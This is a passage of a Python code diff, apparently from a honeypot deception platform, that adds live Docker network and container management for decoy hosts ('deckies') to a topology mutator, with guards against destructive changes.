            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
            topology_id,
        )
        return

    # Lazy imports — these pull in docker.py / network.py which both
    # require the docker SDK; keeping them out of module-import keeps
    # the mutator usable in test environments that stub docker.
    import docker
    from decnet.engine.deployer import _topology_compose_path
    from decnet.network import create_bridge_network, remove_bridge_network
    from decnet.topology.compose import _network_name, write_topology_compose

    client = None
    try:
        # Built inside the try: constructing the client can itself raise
        # (e.g. a malformed DOCKER_HOST), and this helper promises not to
        # propagate docker failures to the caller.
        client = docker.from_env()

        if created is not None:
            name, subnet, is_dmz = created
            net_name = _network_name(topology_id, name)
            try:
                create_bridge_network(
                    client, net_name, subnet, internal=not is_dmz,
                )
            except Exception as exc:  # noqa: BLE001
                _log.error(
                    "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
                    topology_id, name, subnet, exc,
                )
                # Don't re-raise — the DB row is the source of truth.
                # Operator can retry by removing + re-adding the LAN.

        if removed is not None:
            net_name = _network_name(topology_id, removed)
            try:
                remove_bridge_network(client, net_name)
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
                    topology_id, removed, exc,
                )

        # Re-render compose so the file on disk matches the DB.  Even
        # when the bridge create above failed, a future redeploy will
        # try to bring the network back from the compose definition.
        hydrated = await hydrate(repo, topology_id)
        if hydrated is not None:
            try:
                write_topology_compose(
                    hydrated, _topology_compose_path(topology_id),
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live LAN op: compose re-render failed topology=%s: %s",
                    topology_id, exc,
                )
    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
        _log.error(
            "live LAN materialisation crashed topology=%s: %s",
            topology_id, exc,
        )
    finally:
        # One client is built per call; release it so a long-running
        # mutator does not accumulate open connections.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug(
                    "live LAN op: docker client close failed topology=%s: %s",
                    topology_id, exc,
                )
|
||||||
|
|
||||||
|
|
||||||
|
def _is_buildx_wedge(exc: BaseException) -> bool:
    """Report whether *exc* carries both buildx EROFS-wedge signatures.

    The search text is the exception's ``stderr`` attribute (when present
    and truthy) joined with ``str(exc)``, lower-cased.  Both forms are
    consulted because ``_compose_with_retry`` raises a synthetic
    CalledProcessError whose ``stderr`` contains the recovery hint (which
    preserves the wedge signatures verbatim).

    Returns:
        True only when both signature constants occur in the search text.
    """
    from decnet.engine.deployer import (
        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
    )

    captured = getattr(exc, "stderr", None)
    stderr_text = str(captured) if captured else ""
    haystack = " ".join((stderr_text, str(exc))).lower()
    return all(
        signature in haystack
        for signature in (_BUILDX_WEDGE_SIGNATURE, _BUILDX_EROFS_SIGNATURE)
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _compose_up_with_buildkit_fallback(
    *args: str, compose_file, label: str,
) -> None:
    """Run a compose command; on a buildx wedge, retry once with the legacy builder.

    The first attempt goes through ``_compose_with_retry`` unchanged.  If
    it raises and ``_is_buildx_wedge`` recognises the failure, a warning
    is logged and the same command is run a second time with
    ``env={"DOCKER_BUILDKIT": "0"}``.  Any other exception is re-raised
    as-is, and a failure of the second attempt propagates to the caller.

    Args:
        *args: Compose CLI arguments, forwarded verbatim.
        compose_file: Compose file handed to ``_compose_with_retry``.
        label: Human-readable identifier used only in the warning log line
            so an operator can trace the fall-back to the originating op.
    """
    import anyio
    from decnet.engine.deployer import _compose_with_retry

    def _default_builder_attempt():
        return _compose_with_retry(*args, compose_file=compose_file)

    def _legacy_builder_attempt():
        return _compose_with_retry(
            *args, compose_file=compose_file,
            env={"DOCKER_BUILDKIT": "0"},
        )

    try:
        await anyio.to_thread.run_sync(_default_builder_attempt)
    except Exception as exc:  # noqa: BLE001
        if not _is_buildx_wedge(exc):
            raise
        _log.warning(
            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
            "(legacy builder). Recover the buildx state at your leisure: "
            "rm -rf ~/.docker/buildx/activity && "
            "docker buildx create --name decnet-builder --use --bootstrap",
            label,
        )
    else:
        return

    # Deliberately outside the except clause so that, if the retry also
    # fails, its traceback is not chained under the first failure.
    await anyio.to_thread.run_sync(_legacy_builder_attempt)
|
||||||
|
|
||||||
|
|
||||||
|
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
    """List the compose service names belonging to one decky.

    The first element is always the base (``decky_name``); it is followed
    by ``"<decky_name>-<service>"`` for every entry of *services* that is
    not a ``fleet_singleton`` in the service registry.  Fleet singletons
    run once fleet-wide and have no per-decky compose entry; the same
    filter is applied at compose-render time
    (:mod:`decnet.topology.compose.generate_topology_compose`).
    """
    from decnet.services.registry import get_service

    def _gets_per_decky_entry(svc_name: str) -> bool:
        try:
            svc = get_service(svc_name)
        except KeyError:
            # Unknown service: keep the name rather than silently dropping
            # it.  The compose render emits no fragment for it, so the
            # later compose call surfaces a "no such service" error.
            return True
        return not svc.fleet_singleton

    per_service = [
        f"{decky_name}-{svc_name}"
        for svc_name in services
        if _gets_per_decky_entry(svc_name)
    ]
    return [decky_name, *per_service]
|
||||||
|
|
||||||
|
|
||||||
|
async def _live_topology_or_none(
    repo: Any, topology_id: str,
) -> Optional[Any]:
    """Return the topology row only when it's eligible for live materialisation.

    Returns None (so callers can skip with a single ``if`` check) when:

    * the topology doesn't exist;
    * status is not ``active`` or ``degraded`` (pending topologies get
      everything materialised at deploy time);
    * the topology is pinned to a swarm agent (cross-host live editing
      is its own routing workstream) — this case is also logged at INFO.

    Args:
        repo: Repository exposing an awaitable ``get_topology(topology_id)``.
        topology_id: Identifier of the topology to look up.

    Returns:
        The object returned by ``repo.get_topology`` or None.  The row is
        read through attributes (``.status``, ``.target_host_uuid``), so it
        is annotated as an opaque object rather than a ``dict``.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return None
    if topology.status not in ("active", "degraded"):
        return None
    if topology.target_host_uuid:
        _log.info(
            "live decky op skipped (agent-pinned topology=%s); "
            "next agent push will reconcile",
            topology_id,
        )
        return None
    return topology
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_compose(repo: Any, topology_id: str) -> None:
    """Rewrite the per-topology compose file from the current DB state.

    Hydrates the topology and, when hydration yields something, writes it
    to the path given by ``_topology_compose_path``.  A failure while
    writing is logged as a warning and swallowed so it doesn't poison the
    DB-side mutation; a ``None`` hydration result is a silent no-op.
    """
    from decnet.engine.deployer import _topology_compose_path
    from decnet.topology.compose import write_topology_compose

    snapshot = await hydrate(repo, topology_id)
    if snapshot is not None:
        try:
            destination = _topology_compose_path(topology_id)
            write_topology_compose(snapshot, destination)
        except Exception as exc:  # noqa: BLE001
            _log.warning(
                "live op: compose re-render failed topology=%s: %s",
                topology_id, exc,
            )
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_spawn(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
    """Bring up one decky (base + services) with ``compose up -d --no-deps --build``.

    The compose file is re-rendered first so it lists the new decky.

    Returns:
        True when the compose call completed without raising.  False when
        it raised (the error is logged, not re-raised — the DB row is the
        source of truth) or when ``_live_topology_or_none`` reports the
        topology as not eligible for live materialisation, so the caller
        doesn't flip the state to ``running`` based on a no-op.
    """
    eligible = await _live_topology_or_none(repo, topology_id)
    if eligible is None:
        return False

    from decnet.engine.deployer import _topology_compose_path

    await _rerender_compose(repo, topology_id)
    service_names = _decky_targets(decky_name, services)
    compose_file = _topology_compose_path(topology_id)
    try:
        await _compose_up_with_buildkit_fallback(
            "up", "-d", "--no-deps", "--build", *service_names,
            compose_file=compose_file,
            label=f"live add_decky topology={topology_id} decky={decky_name}",
        )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live add_decky: compose up failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
        return False
    else:
        return True
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_remove(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
    """Stop and force-remove one decky's containers, then re-render compose.

    No-op when ``_live_topology_or_none`` says the topology is not
    eligible.  Each compose step is best-effort: a failure is logged as a
    warning and the next step still runs.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)

    # Both steps run BEFORE the compose re-render: the re-rendered file no
    # longer mentions the decky, so a stop issued afterwards would find no
    # service to act on.
    steps = (
        (
            ("stop",),
            "live remove_decky: compose stop failed topology=%s decky=%s: %s",
        ),
        (
            ("rm", "-f"),
            "live remove_decky: compose rm failed topology=%s decky=%s: %s",
        ),
    )
    for verb, failure_msg in steps:
        try:
            await anyio.to_thread.run_sync(
                lambda verb=verb: _compose(
                    *verb, *targets, compose_file=compose_path,
                ),
            )
        except Exception as exc:  # noqa: BLE001
            _log.warning(failure_msg, topology_id, decky_name, exc)

    await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_connect(
    repo: Any, topology_id: str,
    decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
    """SDK ``network.connect`` to multi-home a running base container.

    Service containers share the base's netns via ``network_mode:
    service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
    the base alone gives every service container the new interface for
    free — we don't need to iterate.

    No-op when ``_live_topology_or_none`` reports the topology as not
    eligible.  Docker failures are logged, never re-raised; an APIError
    whose message indicates the endpoint already exists is treated as
    success.  The compose file is re-rendered afterwards in every case.

    Args:
        repo: Repository handed to the eligibility check and the re-render.
        topology_id: Topology owning the decky and the LAN.
        decky_name: Decky whose base container gets attached.
        lan_name: LAN whose docker network the container joins.
        ipv4_address: Address to assign on that network.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.connect(container, ipv4_address=ipv4_address)
    except docker.errors.APIError as exc:
        # Idempotency — already on the network is fine.
        msg = str(exc).lower()
        # Grouping made explicit; this is how ``and``/``or`` precedence
        # already evaluated the original expression.
        if "already" in msg or ("endpoint" in msg and "exists" in msg):
            _log.info(
                "live attach_decky: %s already on network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        # A fresh client is built on every call; release it so repeated
        # live edits do not accumulate open connections.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug(
                    "live attach_decky: docker client close failed topology=%s: %s",
                    topology_id, exc,
                )
    await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_disconnect(
    repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
    """SDK ``network.disconnect`` to drop a multi-home edge.

    No-op when ``_live_topology_or_none`` reports the topology as not
    eligible.  Docker failures are logged, never re-raised; an APIError
    whose message contains "not connected" or "no such" is treated as
    "already detached".  The compose file is re-rendered afterwards in
    every case.

    Args:
        repo: Repository handed to the eligibility check and the re-render.
        topology_id: Topology owning the decky and the LAN.
        decky_name: Decky whose base container gets detached.
        lan_name: LAN whose docker network the container leaves.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.disconnect(container)
    except docker.errors.APIError as exc:
        msg = str(exc).lower()
        if "not connected" in msg or "no such" in msg:
            _log.info(
                "live detach_decky: %s already off network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        # A fresh client is built on every call; release it so repeated
        # live edits do not accumulate open connections.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug(
                    "live detach_decky: docker client close failed topology=%s: %s",
                    topology_id, exc,
                )
    await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_services_diff(
    repo: Any, topology_id: str,
    decky_name: str,
    added: list[str],
    removed: list[str],
) -> None:
    """Add/remove per-service containers without touching siblings.

    Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
    without coupling the mutator to that module — service mutations
    routed via the mutator queue publish ``mutation.applied`` while the
    direct API publishes ``decky.<name>.service_added``; they share
    machinery, not control flow.

    Order of operations:

    1. ``compose stop`` + ``compose rm -f`` for the removed services,
       against the compose file as it currently is on disk;
    2. re-render the compose file from the DB;
    3. ``compose up -d --no-deps --build`` for the added services.

    Every step is best-effort: failures are logged and the remaining
    steps still run.  No-op when both lists are empty or the topology is
    not eligible for live materialisation.

    Args:
        repo: Repository handed to the eligibility check and the re-render.
        topology_id: Topology owning the decky.
        decky_name: Decky whose service set changed.
        added: Service names newly present on the decky.
        removed: Service names no longer present on the decky.
    """
    if not added and not removed:
        return
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    compose_path = _topology_compose_path(topology_id)

    # Stop + rm BEFORE re-rendering compose: the re-rendered file no longer
    # lists the removed services, so a stop run AFTER rendering would find
    # no service to act on and the old containers would be left running.
    rm_targets = _decky_targets(decky_name, list(removed))[1:]  # drop the base
    if rm_targets:
        for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
            try:
                await anyio.to_thread.run_sync(
                    lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path),  # type: ignore[misc]
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live update_decky %s failed topology=%s decky=%s: %s",
                    action_name, topology_id, decky_name, exc,
                )

    # Now bring the file in line with the DB so the added services exist
    # in it before ``up`` is asked to start them.
    await _rerender_compose(repo, topology_id)

    add_targets = _decky_targets(decky_name, list(added))[1:]  # drop the base
    if add_targets:
        try:
            await _compose_up_with_buildkit_fallback(
                "up", "-d", "--no-deps", "--build", *add_targets,
                compose_file=compose_path,
                label=f"live update_decky add topology={topology_id} decky={decky_name}",
            )
        except Exception as exc:  # noqa: BLE001
            _log.error(
                "live update_decky add: compose up failed topology=%s decky=%s: %s",
                topology_id, decky_name, exc,
            )
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_recreate_base(
    repo: Any, topology_id: str, decky_name: str,
) -> None:
    """Force-recreate only the decky's base container (used for forwards_l3 flips).

    DESTRUCTIVE: any in-container state on the base is lost.  Per the
    compose layout, service containers re-attach via ``network_mode:
    service:<base>`` once the base is rebuilt.  Gating on an explicit
    operator-supplied ``force=true`` flag is the caller's responsibility.

    The compose file is re-rendered before the ``up --force-recreate``
    call.  A failing compose call is logged and swallowed; the function is
    a no-op when the topology is not eligible for live materialisation.
    """
    eligible = await _live_topology_or_none(repo, topology_id)
    if eligible is None:
        return

    import anyio
    from decnet.engine.deployer import (
        _compose_with_retry, _topology_compose_path,
    )

    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)

    def _recreate():
        return _compose_with_retry(
            "up", "-d", "--no-deps", "--force-recreate", decky_name,
            compose_file=compose_path,
        )

    try:
        await anyio.to_thread.run_sync(_recreate)
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live update_decky recreate_base failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
|
||||||
|
|
||||||
|
|
||||||
# ------------------------------------------------------------------- ops
|
# ------------------------------------------------------------------- ops
|
||||||
|
|
||||||
|
|
||||||
@@ -131,6 +588,16 @@ async def apply_add_lan(
|
|||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Live materialisation: when the topology is active/degraded, create
|
||||||
|
# the docker bridge network now and re-render the per-topology
|
||||||
|
# compose file so subsequent ``apply_add_decky`` writes a coherent
|
||||||
|
# services map. Pending topologies skip this — the next deploy
|
||||||
|
# creates everything from scratch. Agent-pinned topologies also
|
||||||
|
# skip; live editing on agents is its own routing problem.
|
||||||
|
await _materialise_lan_change(
|
||||||
|
repo, topology_id, created=(name, subnet, is_dmz),
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -150,7 +617,17 @@ async def apply_remove_lan(
|
|||||||
f"LAN {lan['name']!r} is the home LAN of decky "
|
f"LAN {lan['name']!r} is the home LAN of decky "
|
||||||
f"{d['decky_config']['name']!r}; remove the decky first"
|
f"{d['decky_config']['name']!r}; remove the decky first"
|
||||||
)
|
)
|
||||||
await repo.delete_lan(lan["id"])
|
lan_name = lan["name"]
|
||||||
|
# enforce_pending=False: the mutator queue is the live-editing
|
||||||
|
# surface, gated on topology status by us before we got here. The
|
||||||
|
# repo's pending-only guard is for HTTP CRUD callers that mustn't
|
||||||
|
# bypass it.
|
||||||
|
await repo.delete_lan(lan["id"], enforce_pending=False)
|
||||||
|
|
||||||
|
# Live materialisation symmetric to apply_add_lan: tear down the
|
||||||
|
# docker bridge and re-render compose so a future redeploy doesn't
|
||||||
|
# try to wire deckies into a network that no longer exists.
|
||||||
|
await _materialise_lan_change(repo, topology_id, removed=lan_name)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -204,11 +681,12 @@ async def apply_add_decky(
|
|||||||
if forwards_l3:
|
if forwards_l3:
|
||||||
decky_config["forwards_l3"] = True
|
decky_config["forwards_l3"] = True
|
||||||
|
|
||||||
|
services_list = list(payload.get("services", []))
|
||||||
decky_uuid = await repo.add_topology_decky(
|
decky_uuid = await repo.add_topology_decky(
|
||||||
{
|
{
|
||||||
"topology_id": topology_id,
|
"topology_id": topology_id,
|
||||||
"name": name,
|
"name": name,
|
||||||
"services": list(payload.get("services", [])),
|
"services": services_list,
|
||||||
"decky_config": decky_config,
|
"decky_config": decky_config,
|
||||||
"x": payload.get("x"),
|
"x": payload.get("x"),
|
||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
@@ -223,6 +701,25 @@ async def apply_add_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: spawn the new decky's containers without
|
||||||
|
# touching siblings. Skips on pending / agent-pinned topologies —
|
||||||
|
# see _live_topology_or_none.
|
||||||
|
spawned = await _materialise_decky_spawn(
|
||||||
|
repo, topology_id, name, services_list,
|
||||||
|
)
|
||||||
|
# Flip the row's state to 'running' on success so the dashboard's
|
||||||
|
# ACTIVE DECKIES count reflects reality. Without this the row
|
||||||
|
# stays at the default 'pending' forever; the deployer's full
|
||||||
|
# post-deploy reconcile only runs on a fresh deploy_topology.
|
||||||
|
if spawned:
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(decky_uuid, {"state": "running"})
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live add_decky: state flip to running failed "
|
||||||
|
"topology=%s decky=%s: %s",
|
||||||
|
topology_id, name, exc,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -286,6 +783,16 @@ async def apply_attach_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: SDK network.connect on the base container.
|
||||||
|
# Service containers share the base's netns via network_mode:
|
||||||
|
# service:<base>, so they inherit the new interface — only the base
|
||||||
|
# needs the connect.
|
||||||
|
await _materialise_decky_connect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
ipv4_address=ip,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -329,7 +836,15 @@ async def apply_detach_decky(
|
|||||||
await repo.update_topology_decky(
|
await repo.update_topology_decky(
|
||||||
decky["uuid"], {"decky_config": new_cfg}
|
decky["uuid"], {"decky_config": new_cfg}
|
||||||
)
|
)
|
||||||
await repo.delete_topology_edge(edge["id"])
|
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
|
||||||
|
# Live materialisation: SDK network.disconnect on the base
|
||||||
|
# container. Service containers automatically lose visibility into
|
||||||
|
# the LAN because they share the base's netns.
|
||||||
|
await _materialise_decky_disconnect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -340,7 +855,15 @@ async def apply_remove_decky(
|
|||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
await repo.delete_topology_decky(decky["uuid"])
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
services_list = list(decky.get("services") or [])
|
||||||
|
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
|
||||||
|
# Live materialisation: stop + rm -f the decky's containers. We
|
||||||
|
# capture decky_name + services BEFORE the delete so the helper
|
||||||
|
# has the targets even though the row is gone.
|
||||||
|
await _materialise_decky_remove(
|
||||||
|
repo, topology_id, decky_name, services_list,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -354,31 +877,136 @@ async def apply_update_decky(
|
|||||||
``patch`` — dict merged into existing ``decky_config``.
|
``patch`` — dict merged into existing ``decky_config``.
|
||||||
``services`` — replacement top-level services list.
|
``services`` — replacement top-level services list.
|
||||||
``x``,``y`` — layout coords.
|
``x``,``y`` — layout coords.
|
||||||
|
``force`` — opt-in for destructive recreates (currently
|
||||||
|
required when ``forwards_l3`` flips on a
|
||||||
|
live topology — see below).
|
||||||
|
|
||||||
|
Live materialisation strategy:
|
||||||
|
|
||||||
|
* **services changed** → diff old vs new; ``compose up -d`` for
|
||||||
|
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
|
||||||
|
direct API path (services_live) without coupling.
|
||||||
|
* **forwards_l3 flipped** → port publishing changes, which docker
|
||||||
|
can only apply at container-create time. Requires recreating
|
||||||
|
the base — destructive (kills in-container state, drops active
|
||||||
|
sessions). Gated on ``payload['force'] is True``; otherwise we
|
||||||
|
raise ``MutationError`` so a half-thinking operator doesn't
|
||||||
|
stomp a live decky.
|
||||||
|
* **only coords (x/y)** → DB-only. No docker work.
|
||||||
"""
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
hydrated = await _hydrated(repo, topology_id)
|
||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
|
|
||||||
|
# Capture pre-state so we can compute the diff after the DB write.
|
||||||
|
old_services = list(decky.get("services") or [])
|
||||||
|
old_cfg = decky.get("decky_config") or {}
|
||||||
|
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
|
||||||
|
|
||||||
patch: dict[str, Any] = {}
|
patch: dict[str, Any] = {}
|
||||||
|
new_decky_config = old_cfg
|
||||||
if payload.get("patch"):
|
if payload.get("patch"):
|
||||||
merged = dict(decky["decky_config"])
|
new_decky_config = {**old_cfg, **payload["patch"]}
|
||||||
merged.update(payload["patch"])
|
patch["decky_config"] = new_decky_config
|
||||||
patch["decky_config"] = merged
|
new_services = old_services
|
||||||
if "services" in payload:
|
if "services" in payload:
|
||||||
patch["services"] = list(payload["services"])
|
new_services = list(payload["services"])
|
||||||
|
patch["services"] = new_services
|
||||||
for key in ("x", "y"):
|
for key in ("x", "y"):
|
||||||
if key in payload:
|
if key in payload:
|
||||||
patch[key] = payload[key]
|
patch[key] = payload[key]
|
||||||
if not patch:
|
if not patch:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
|
||||||
|
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
|
||||||
|
|
||||||
|
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
|
||||||
|
# 'gateway' semantic specifically means 'host-port publisher facing
|
||||||
|
# the DMZ' — running it on an internal LAN publishes ports the
|
||||||
|
# outside world can't reach and shadows the host's port space.
|
||||||
|
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
|
||||||
|
# the generator/attach paths, not by this op, so this check only
|
||||||
|
# fires when the operator explicitly toggles the flag.
|
||||||
|
if forwards_l3_flipped and new_forwards_l3:
|
||||||
|
# Re-derive the home LAN from the edges; same logic as
|
||||||
|
# check_gateway_homed_in_dmz.
|
||||||
|
decky_uuid = decky["uuid"]
|
||||||
|
home_lan_id: Optional[str] = None
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
if home_lan_id is None:
|
||||||
|
for e in hydrated["edges"]:
|
||||||
|
if e["decky_uuid"] == decky_uuid:
|
||||||
|
home_lan_id = e["lan_id"]
|
||||||
|
break
|
||||||
|
home_lan = next(
|
||||||
|
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
|
||||||
|
None,
|
||||||
|
)
|
||||||
|
if home_lan is None or not home_lan.get("is_dmz"):
|
||||||
|
home_name = home_lan["name"] if home_lan else "(unknown)"
|
||||||
|
raise MutationError(
|
||||||
|
f"cannot promote decky {decky['decky_config']['name']!r} "
|
||||||
|
f"to gateway: home LAN {home_name!r} is not a DMZ. "
|
||||||
|
"Move the decky to the DMZ first, or pick a different decky."
|
||||||
|
)
|
||||||
|
|
||||||
|
# Pre-check the destructive flip BEFORE any DB write, so a refused
|
||||||
|
# mutation leaves zero side-effects.
|
||||||
|
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
|
||||||
|
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
|
||||||
|
raise MutationError(
|
||||||
|
f"forwards_l3 flip on live decky "
|
||||||
|
f"{decky['decky_config']['name']!r} requires force=true; "
|
||||||
|
"this will recreate the base container and drop in-container state"
|
||||||
|
)
|
||||||
|
|
||||||
await repo.update_topology_decky(decky["uuid"], patch)
|
await repo.update_topology_decky(decky["uuid"], patch)
|
||||||
|
|
||||||
|
# Materialisation — only when the topology is actually live.
|
||||||
|
# _live_topology_or_none was already called above; calling the
|
||||||
|
# individual helpers re-checks (cheap) so they stay self-contained.
|
||||||
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
added = sorted(set(new_services) - set(old_services))
|
||||||
|
removed = sorted(set(old_services) - set(new_services))
|
||||||
|
if added or removed:
|
||||||
|
await _materialise_decky_services_diff(
|
||||||
|
repo, topology_id, decky_name, added, removed,
|
||||||
|
)
|
||||||
|
if forwards_l3_flipped:
|
||||||
|
# force was checked above; reaching here means the operator
|
||||||
|
# opted in. recreate_base re-renders compose first so the
|
||||||
|
# rebuilt base picks up the new `ports:` block.
|
||||||
|
await _materialise_decky_recreate_base(
|
||||||
|
repo, topology_id, decky_name,
|
||||||
|
)
|
||||||
|
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
async def apply_update_lan(
|
async def apply_update_lan(
|
||||||
repo: Any, topology_id: str, payload: dict[str, Any]
|
repo: Any, topology_id: str, payload: dict[str, Any]
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Update LAN fields — subnet, is_dmz, coords, rename."""
|
"""Update LAN fields — subnet, is_dmz, coords, rename.
|
||||||
|
|
||||||
|
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
|
||||||
|
Live deckies bind to the bridge with IPs allocated from the old
|
||||||
|
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
|
||||||
|
flag, which docker can't change on a network with active
|
||||||
|
containers). Reject those mutations on active/degraded topologies
|
||||||
|
rather than rewriting the DB into an incoherent state.
|
||||||
|
|
||||||
|
Coord-only updates (``x``/``y``) are layout-only; let them through
|
||||||
|
unconditionally. Renames pass through too — the bridge's docker
|
||||||
|
name is keyed off ``_network_name(topology_id, lan_name)``, so a
|
||||||
|
rename would also need a rebuild — but rename isn't currently a
|
||||||
|
code path on active topologies; if the operator hits it we still
|
||||||
|
write the row and let the next deploy reconcile.
|
||||||
|
"""
|
||||||
hydrated = await _hydrated(repo, topology_id)
|
